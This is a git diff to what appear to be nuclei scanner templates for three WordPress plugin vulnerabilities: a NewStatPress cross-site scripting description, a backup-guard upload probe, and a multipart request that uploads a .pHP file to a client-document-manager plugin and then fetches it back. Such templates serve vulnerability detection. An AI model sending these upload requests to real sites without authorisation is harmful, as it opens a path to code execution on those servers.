diff --git a/cves/2015/CVE-2015-9312.yaml b/cves/2015/CVE-2015-9312.yaml index e01780289d..8328a5eff8 100644 --- a/cves/2015/CVE-2015-9312.yaml +++ b/cves/2015/CVE-2015-9312.yaml @@ -5,7 +5,7 @@ info: author: r3Y3r53 severity: medium description: | - WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file âincludes/nsp_search.phpâ, several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. + WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://g0blin.co.uk/g0blin-00057/ diff --git a/cves/2021/CVE-2021-24155.yaml b/cves/2021/CVE-2021-24155.yaml index 36427fd6e6..44ea4c8696 100644 --- a/cves/2021/CVE-2021-24155.yaml +++ b/cves/2021/CVE-2021-24155.yaml @@ -55,6 +55,7 @@ requests: GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} + req-condition: true cookie-reuse: true matchers-condition: and diff --git a/cves/2021/CVE-2021-24347.yaml b/cves/2021/CVE-2021-24347.yaml index f97931e55a..007295d474 100644 --- a/cves/2021/CVE-2021-24347.yaml +++ b/cves/2021/CVE-2021-24347.yaml @@ -49,10 +49,12 @@ requests: ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-name" + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-file[]"; filename="" Content-Type: application/octet-stream + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP" Content-Type: image/svg+xml @@ -65,12 +67,14 @@ requests: ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-notes" + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="sp-cdm-community-upload" Upload ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy-- + - | GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1 Host: {{Hostname}}